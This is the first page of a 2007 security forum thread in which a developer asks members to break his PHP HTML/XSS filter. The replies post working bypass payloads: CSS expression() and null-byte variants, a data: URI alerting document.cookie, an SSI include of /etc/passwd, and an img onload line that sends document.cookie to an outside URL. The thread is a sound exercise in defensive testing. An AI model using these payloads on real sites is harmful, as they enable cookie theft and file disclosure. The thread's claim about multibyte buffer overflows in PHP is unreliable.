Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
XSS Filter
Date: January 19, 2007 04:07PM

Hello everyone,

For a little while now I have been tweaking and revising a forum extension meant to strip out javascript from html, which I originally threw together as a better replacement for the previous one. Firstly I'd just like to thank rsnake for his comprehensive list of possible xss attacks; I've found the page to be extremely useful in trying to make this a safe but 'defensive' filter (by defensive I mean it tries to alter the original content as little as possible).

So I've tried every xss example on rsnake's page against it, and seems to manage to catch every one (although I'm not too sure about the js include thing, as I haven't actually tried that so I'm not 100% sure replacing the ampersand with & would work or not...) However, one can never be too sure, so I'd be really gratful if some of you guys could test it for me. Just, like, try to find a way to insert js :-P

You can find a test page here: http://sirnot.110mb.com/htmlformatter.php
and the source here: http://sirnot.110mb.com/htmlformatter.php.txt
(and here's a version with purdy colors: http://sirnot.110mb.com/htmlformatter.php.html )

Thanks in advance for any help :-)

Options: ReplyQuote
Re: XSS Filter
Posted by: Anonymous User
Date: January 19, 2007 04:30PM

very nice work! i will definitely give it a try.

Options: ReplyQuote
Re: XSS Filter
Posted by: Spikeman
Date: January 20, 2007 10:19PM

The page times out.

Options: ReplyQuote
Re: XSS Filter
Date: January 21, 2007 04:43AM

damnit, I swear I am cursed to have bad luck with free web hosts...

well here's the source, at least: http://sirnot.googlepages.com/htmlformatter.php.txt

Options: ReplyQuote
Re: XSS Filter
Posted by: Spikeman
Date: January 21, 2007 10:18PM

It works now, looks like it works pretty well, but it is a little strange, how it changes onload to #111;nload.. I wonder if this could somehow be exploited?

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 12:19PM

This looks really interesting. I'm going to play with it for a bit. So far so good though. Thanks for the contribution, SirNotAppearingOnThisForum!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Date: January 22, 2007 12:51PM

@spikeman: it changes things like on[whatever] to an html entity equivelent so urls and other legitimate attributes that happen to have that combination aren't messed up. Eg. a url like ht tp://example.com/bla?onregister=redirect would still function normally if the onregister was changed to onregister.

thanks to everyone for taking the time to look at it :-)

EDIT: fixed url example



Edited 4 time(s). Last edit at 01/22/2007 12:58PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 01:07PM

Pretty, pretty cool!

I gave it a spin just now with a few nulls:

I inputted this:
<s%00cript src="http://www.google.com/b0mbs.js"></SCRIPT>

I got this as result:
<s%00cript src="http://www.google.com/b0mbs.js"></s%00cript>


But I see that in the source the result is different then on screen? intentionally?

I see that 's' is replaced with an cariage return: &#115;

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 01:13PM

Okay, I found one that definitely works around your filter, SirNotAppearingOnThisForum:

<A STYLE='xss:ex&&#x23;x2F;*XSS*//*/*/p/*/pres/*/ression(alert("XSS"))'>asdf</a>

Good try though. Keep working on it!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Date: January 22, 2007 01:29PM

ok rsnake, try it now :-P (the source is now at http://sirnot.110mb.com/source.php , by the way; was easier than reuploading each time)

the reason it's a slightly different output, jungsonn, is because it a) removes all instances of <script> and </script> and b) it tries to make sure there aren't any stray opening/closing tags. As a consequence, it removed the closing tag and then recreated it.



Edited 1 time(s). Last edit at 01/22/2007 01:31PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 01:46PM

This seems to get through:

<A STYLE='xss:expression\(alert("XSS"))'>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 02:06PM

I asume <ilayer> get's through also, but that's NS4.

But, i'm actually impressed by your work, without doubt one of the better filters i've seen so far regarding HTML input. Do you mind if I host it myself? ofcorse with credits and a blog notation about it.

edit: I guess a bigger array with more vectors would solve alot more



Edited 1 time(s). Last edit at 01/22/2007 02:08PM by jungsonn.

Options: ReplyQuote
Re: XSS Filter
Date: January 22, 2007 02:30PM

@rsnake: is that the only character that works there? do you know if it work for url()'s too (all the browsers I'm using seem to have stopped supported js in css urls...)?

should be fixed for that one, though.

@jungsonn: sure, if you want to, but if I were you I'd wait until rsnake has stopped finding loopholes in it :-P



Edited 1 time(s). Last edit at 01/22/2007 02:31PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 03:11PM

<A STYLE='xss:expressio&#92;n(alert("XSS"))'>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 03:20PM

Sorry, I should have responded to your initial question. After checking my fuzzer it looks like only null and \ work in UTF-8.

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 01/22/2007 03:24PM by rsnake.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 03:24PM

Yeah you bet I wait ^^


I got a few more:

<s\0cript>

<ilayer src="http://www.google.com">

Alerting document.cookie:
data:text/plain;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

SSI:
</!--%20#include%20virtual="../../etc/passwd"%20-->

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 03:32PM

Here's another one (no obfuscation whatsoever):

<A style=xss:expression(alert("XSS"))>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 03:37PM

Haven't test this one, but think it could work:

<img \0onLoad="javas\0cript:window.open('http://www.google.com/crap.php?c='+document.cookie)">

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 22, 2007 04:02PM

Oh and a small one to start <script>.
could be usefull if at some place the script is being closed:

<&#83;alert('blah')</&#115;cript>

Options: ReplyQuote
Re: XSS Filter
Date: January 22, 2007 04:49PM

yikes! those were some major bugs... (your last one, rsnake, was caused by the fact that the regex was non-greedy, and there were no boundries, so it simply retrieved one character)

ok, think I fixed those...

EDIT: make sure to refresh the cache if you're viewing the source



Edited 1 time(s). Last edit at 01/22/2007 04:50PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 06:01PM

Just tell me when you want me to stop. ;)

<A style=`xss:expression/*
*/(alert("XSS"))`>asdf</a>

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 22, 2007 10:25PM

Okay, found another five issues:

<A style='xss:expr\0ession(alert("XSS"))'>asdf</a>
<A style='xss:expressione\xpression\(alert("XSS"))'>asdf</a>
<A style='xss:exp&\&#x23;x72;ession(alert("XSS"))'>asdf</a>
<A style='xss:expr/\**/ession(alert("XSS"))'>asdf</a>
<A style='xss:exp&#\x72;ession(alert("XSS"))'>asdf</a>

I think I'm done testing this one for a while. Sorry, SirNotAppearingOnThisForum, looks like this needs some work still.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: anurag
Date: January 23, 2007 12:21AM

try to break this one...
10 bucks who can break this filter first

sorry SirNotAppearingOnThisForum, i dont want to steal your thunder. The original idea is still yours.

Cheers -

Anurag Agarwal
SEEC - Application Security Search Engine (http://www.myappsecurity.com)
http://www.attacklabs.com
blog - http://myappsecurity.blogspot.com

Options: ReplyQuote
Re: XSS Filter
Posted by: anurag
Date: January 23, 2007 12:22AM

oops forgot to mention the url

here it is http://www.attacklabs.com/xssfilter/

Cheers -

Anurag Agarwal
SEEC - Application Security Search Engine (http://www.myappsecurity.com)
http://www.attacklabs.com
blog - http://myappsecurity.blogspot.com

Options: ReplyQuote
Re: XSS Filter
Date: January 23, 2007 10:13AM

*grumbles incoherently...

I have fixed those, though...

@anurag: the point of this was to allow as much html as possible while stripping out javascript, not to simply remove all html + js.



Edited 1 time(s). Last edit at 01/23/2007 10:15AM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 10:23AM

anurag - I don't believe your filter can be broken without injecting into JavaScript space (since you don't attempt to filter +'s or any forms of quotes) or a selected encoding issue (since you don't remove plusses or minutes). But I think what SirNotAppearingOnThisForum is trying to show is how you can still use HTML without being vulnerable to XSS. And what I am proving is that filters are not as simple as most people think they are.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: XSS Filter
Posted by: Anonymous User
Date: January 23, 2007 10:28AM

@rsnake: yepp. take a look at the html purifier sources (in case you didn't which i consider as unlikely) - btw that thing is the only filter i kind of trust and use in productive environments...

Greetings,
.mario

Options: ReplyQuote
Re: XSS Filter
Date: January 23, 2007 10:58AM

could you just give it one more shot, rsnake? just, like 2 minutes max. I only want to see if it's still reasonably easy to exploit, as I'm sure there will always be a way around it...

regardless, thank you very, very much for you help.

Options: ReplyQuote
Re: XSS Filter
Posted by: jungsonn
Date: January 23, 2007 11:33AM

Yeah to be strict: it's for allowing html, and that's a tough nut to crack and do correctly. Thinks SirNot's filter does it pretty good, it's limited to a very few vectors that are left.

Sirnot: If I may say so, You could filter against certain chars on the ASCII chart, could useful cause some exotic chars can break up your PHP functions. like Chinese BIG5 or GBK It's not due to your code, but to PHP's functions itself which allows buffer overflows on multibyte characters above 8 bytes like greek chars in ASCII: &#916;

I wrote a little snippet for myself to not alow ASCII above 175 (most used chars).

preg_match_all('/&#(\d+)/',$input,$chars)
foreach ($chars[1] as $char) {
if ($char > 175) {
# do something
}
}


Anyhow, Your's is getting close to an excellent HTML filter.

Options: ReplyQuote
Re: XSS Filter
Date: January 23, 2007 11:47AM

well the problem with that is that it needs to remain as international as possible, so regrettably removing chars/entities that are over a certain length wouldn't really be an option. (not sure exactly how 'international' the preg_replace functions are, but at least I'd rather not proactively remove chars > a certain length)



Edited 1 time(s). Last edit at 01/23/2007 11:52AM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.